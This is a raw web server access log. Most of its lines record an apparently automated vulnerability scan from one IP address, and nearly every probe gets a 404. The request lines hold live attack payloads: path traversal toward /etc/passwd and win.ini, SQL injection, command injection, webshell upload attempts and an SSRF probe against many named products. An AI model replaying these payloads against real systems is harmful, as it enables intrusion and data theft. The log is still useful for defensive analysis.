205.185.122.202 - - [19/Oct/2025:21:22:58 +0530] "GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:22:58 +0530] "GET /AirWatch/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:23:01 +0530] "POST /aim/equipmap/accept.jsp HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:23:02 +0530] "GET /uapws/service HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:23:05 +0530] "POST /apisix/admin/routes HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:23:06 +0530] "POST /nacos/v1/auth/users/?username=xixwnnqvowcgduau&password=rommjjdszpxsidww HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:23:06 +0530] "POST /v1/auth/users/?username=kphpzooraaprwtyc&password=cpwhbobrrvwtngtq HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:23:08 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:23:09 +0530] "GET /s/jolnj/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 1144
205.185.122.202 - - [19/Oct/2025:21:23:11 +0530] "POST /messageType.do HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:23:12 +0530] "GET /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:23:15 +0530] "GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../ HTTP/1.1" 404 1158
205.185.122.202 - - [19/Oct/2025:21:23:16 +0530] "GET /ops/Login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:23:19 +0530] "GET /search/index.php?keyword=%25%33%31%25%32%37%25%32%30%25%36%31%25%36%45%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%43%25%37%35%25%36%35%25%32%38%25%33%31%25%32%43%25%36%33%25%36%46%25%36%45%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%43%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%30%25%36%44%25%36%34%25%33%35%25%32%38%25%33%31%25%33%36%25%33%38%25%33%32%25%33%37%25%32%39%25%32%39%25%32%43%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:23:20 +0530] "GET /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(41792*41749),null HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:23:22 +0530] "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:23:23 +0530] "POST /user.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:23:24 +0530] "POST /user.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:23:26 +0530] "POST /casmain.xgi HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:23:28 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:23:31 +0530] "GET /ajax/telemetry.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:23:31 +0530] "GET /glpi/ajax/telemetry.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:23:32 +0530] "POST /mgmt/tm/util/bash HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:23:32 +0530] "GET /mgmt/shared/diagnostics/device-stats HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:23:34 +0530] "PUT /ftwsny.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:23:35 +0530] "POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:23:37 +0530] "POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1" 404 1122
205.185.122.202 - - [19/Oct/2025:21:23:38 +0530] "GET /script HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:23:39 +0530] "GET /Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','18264')),3,32) HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:21:23:40 +0530] "POST /upload HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:23:42 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:23:43 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:23:43 +0530] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:23:44 +0530] "GET /index.php?target=db_sql.php%253f/../../../../../../../../windows/win.ini HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:23:46 +0530] "GET /include/thumb.php?dir=http/.....///.....///admin/login/login_check.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:23:46 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:23:47 +0530] "GET /ucms/index.php?do=user HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:23:50 +0530] "POST /upload.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:23:51 +0530] "GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1" 404 1166
205.185.122.202 - - [19/Oct/2025:21:23:56 +0530] "GET /html/device-id HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:23:57 +0530] "GET /?cffaction=get_data_from_database&query=SELECT%20md5(1585295) HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:24:00 +0530] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:24:01 +0530] "POST /aim/equipmap/accept.jsp HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:24:02 +0530] "GET /....//....//webadmin.ini HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:24:03 +0530] "POST /apisix/admin/routes HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:24:06 +0530] "GET /commands.inc.php?searchOption=contains&searchField=1&search=search&searchColumn=1%3d2+UNION+SELECT+(select+concat(0x223E3C42523E5B,md5(209592032),0x5D3C42523E)+limit+0,1),NULL--+ HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:24:07 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:24:09 +0530] "POST /acc/clsf/report/datasource.php HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:24:10 +0530] "POST /messageType.do HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:24:14 +0530] "GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:21:24:15 +0530] "GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../ HTTP/1.1" 404 1158
205.185.122.202 - - [19/Oct/2025:21:24:18 +0530] "POST /zentao/user-login.html HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:24:21 +0530] "GET /search/index.php?keyword=%25%33%31%25%32%37%25%32%30%25%36%31%25%36%45%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%43%25%37%35%25%36%35%25%32%38%25%33%31%25%32%43%25%36%33%25%36%46%25%36%45%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%43%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%30%25%36%44%25%36%34%25%33%35%25%32%38%25%33%31%25%33%30%25%33%39%25%33%39%25%33%35%25%32%39%25%32%39%25%32%43%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:24:23 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:24:24 +0530] "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:24:27 +0530] "POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:24:27 +0530] "POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:24:28 +0530] "POST /casmain.xgi HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:24:31 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:24:33 +0530] "GET /ajax/telemetry.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:24:33 +0530] "GET /glpi/ajax/telemetry.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:24:36 +0530] "POST /?g=portal&m=article&a=edit_post HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:24:37 +0530] "PUT /dilslt.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:24:38 +0530] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700 HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:21:24:39 +0530] "POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1" 404 1122
205.185.122.202 - - [19/Oct/2025:21:24:40 +0530] "POST /web/addons/jqueryFileTree.php HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:24:41 +0530] "GET /Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','8718')),3,32) HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:21:24:43 +0530] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:24:43 +0530] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:24:44 +0530] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:24:44 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:24:44 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:24:47 +0530] "GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:24:48 +0530] "GET /include/thumb.php?dir=http/.....///.....///admin/login/login_check.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:24:48 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:24:51 +0530] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:24:52 +0530] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:24:54 +0530] "POST /upload.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:25:00 +0530] "GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:21:25:02 +0530] "GET /html/device-id HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:25:05 +0530] "GET /Login.jsp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:25:06 +0530] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:25:08 +0530] "GET /jkstatus; HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:25:09 +0530] "GET /....//....//webadmin.ini HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:25:11 +0530] "GET /index.php?mod=system&op=orgtree HTTP/1.1" 404 1012
192.159.99.180 - - [19/Oct/2025:21:25:12 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:25:13 +0530] "GET /commands.inc.php?searchOption=contains&searchField=1&search=search&searchColumn=1%3d2+UNION+SELECT+(select+concat(0x223E3C42523E5B,md5(200641940),0x5D3C42523E)+limit+0,1),NULL--+ HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:25:16 +0530] "POST /extdirect HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:25:18 +0530] "POST /acc/clsf/report/datasource.php HTTP/1.1" 404 1054
176.65.149.21 - - [19/Oct/2025:21:25:19 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:25:22 +0530] "POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:25:23 +0530] "GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1" 404 1086
45.153.34.54 - - [19/Oct/2025:21:25:26 +0530] "GET / HTTP/1.0" 200 11230
205.185.122.202 - - [19/Oct/2025:21:25:27 +0530] "GET /api/sms_check.php?param=1%27and%20extractvalue(1,concat(0x7e,md5('ridss')))%23 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:25:29 +0530] "POST /zentao/user-login.html HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:25:31 +0530] "GET /899013143.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:25:32 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:25:32 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:25:34 +0530] "GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1" 404 1066
176.65.149.21 - - [19/Oct/2025:21:25:35 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:25:36 +0530] "POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:25:36 +0530] "POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:25:43 +0530] "POST /web_shell_cmd.gch HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:25:54 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:26:55 +0530] "POST /web/addons/jqueryFileTree.php HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:26:55 +0530] "POST /index/Api/post_curl HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:26:56 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:26:57 +0530] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:26:57 +0530] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:26:57 +0530] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:26:58 +0530] "PUT /fileserver/hgombo.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:26:58 +0530] "GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:26:59 +0530] "GET /index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467¶m=update_avatar&file=data:image/txt;base64,IjM4Y2E4OTU2NGIyMjU5NDAxNTE4OTYwZjdhMDZmOTRiIg== HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:27:00 +0530] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:27:01 +0530] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:27:01 +0530] "POST /cgi-bin/webupg HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:27:02 +0530] "GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:21:27:04 +0530] "GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:21:27:06 +0530] "GET /Login.jsp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:27:09 +0530] "GET /download.php?file=../../../../../etc/passwd HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:27:10 +0530] "GET /jkstatus; HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:27:14 +0530] "POST /wp-content/plugins/mailpress/mp-includes/action.php HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:21:27:15 +0530] "GET /wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id= HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:21:27:16 +0530] "GET /index.php?mod=system&op=orgtree HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:27:19 +0530] "POST /mainFunctions/comboxstore.action HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:27:19 +0530] "POST /extdirect HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:27:22 +0530] "GET /downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:27:22 +0530] "POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:27:25 +0530] "GET /plugins/weathermap/editor.php?plug=0&mapname=frukna.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=207fde3048c6882fb8dc21d529bf5b28&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7 HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:27:25 +0530] "GET /api/sms_check.php?param=1%27and%20extractvalue(1,concat(0x7e,md5('bsnvn')))%23 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:27:28 +0530] "GET /html/repository HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:27:29 +0530] "GET /845452152.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:27:29 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:27:31 +0530] "GET /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:21:27:33 +0530] "GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:27:38 +0530] "POST /data/sys-common/treexml.tmpl HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:27:39 +0530] "POST /web_shell_cmd.gch HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:27:41 +0530] "GET /s/pqdcyx/_/;/WEB-INF/web.xml HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:27:42 +0530] "POST /OA/PM/svc.asmx HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:27:44 +0530] "POST /defaultroot/public/iWebOfficeSign/OfficeServer.jsp HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:21:27:45 +0530] "POST /password_change.cgi HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:27:47 +0530] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:27:48 +0530] "POST /index/Api/post_curl HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:27:48 +0530] "POST /index/Api/post_curl HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:27:51 +0530] "GET /images/WAVLINK-logo.png HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:27:52 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:27:54 +0530] "GET /mysql_config.ini HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:27:55 +0530] "PUT /fileserver/gdmmdu.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:27:58 +0530] "GET /egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?spellchecker_lang=egroupware_spellchecker_cmd_exec.nasl%7C%7Cexpr%2044511%20%2b%2040980%7C%7C HTTP/1.1" 404 1210
205.185.122.202 - - [19/Oct/2025:21:27:59 +0530] "GET /index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467¶m=update_avatar&file=data:image/txt;base64,IjRlZGFhMTA1ZDVmNTM1OTAzMzg3OTE5NTFlMzhjM2FkIg== HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:28:02 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:28:03 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:28:03 +0530] "POST /cgi-bin/webupg HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:28:07 +0530] "POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:28:07 +0530] "GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:21:28:10 +0530] "GET /mas/sysinfo/testCommandExecutor.jsp?cmdLine=type%201077392%20+%202909311&workDir=&pathEnv=&libPathEnv= HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:28:11 +0530] "GET /download.php?file=../../../../../etc/passwd HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:28:14 +0530] "POST /web/storage/raid_cgi.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:28:16 +0530] "POST /wp-content/plugins/mailpress/mp-includes/action.php HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:21:28:16 +0530] "GET /wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id= HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:21:28:21 +0530] "POST /fileupload/toolsAny HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:28:21 +0530] "POST /fileupload/toolsAny HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:28:22 +0530] "POST /mainFunctions/comboxstore.action HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:28:26 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:28:26 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:28:26 +0530] "GET /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:28:27 +0530] "GET /downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:28:31 +0530] "POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=jyxddlnmknssbjahrcgn.jsp&filename=1.jpg HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:28:32 +0530] "GET /plugins/weathermap/editor.php?plug=0&mapname=wamizg.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=07c09f95adf25a2352d2171832e49e04&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7 HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:28:36 +0530] "GET /rest/api/2/user/picker?query=huqdycnr HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:28:37 +0530] "GET /html/repository HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:28:40 +0530] "POST /ioffice/prg/set/wss/ioAssistance.asmx HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:28:41 +0530] "GET /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:21:28:47 +0530] "GET /public/login.htm?type=version HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:28:48 +0530] "POST /data/sys-common/treexml.tmpl HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:28:52 +0530] "GET /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd HTTP/1.1" 404 1158
205.185.122.202 - - [19/Oct/2025:21:28:52 +0530] "GET /s/kfldqz/_/;/WEB-INF/web.xml HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:28:54 +0530] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:28:55 +0530] "POST /defaultroot/public/iWebOfficeSign/OfficeServer.jsp HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:21:28:57 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:28:58 +0530] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:29:01 +0530] "POST /druid/indexer/v1/sampler HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:29:02 +0530] "GET /images/WAVLINK-logo.png HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:29:04 +0530] "POST /?q=node&destination=node HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:29:05 +0530] "GET /mysql_config.ini HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:29:07 +0530] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:29:08 +0530] "GET /egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?spellchecker_lang=egroupware_spellchecker_cmd_exec.nasl%7C%7Cexpr%2041218%20%2b%2040102%7C%7C HTTP/1.1" 404 1210
205.185.122.202 - - [19/Oct/2025:21:29:12 +0530] "POST /register.php HTTP/1.1" 404 1018
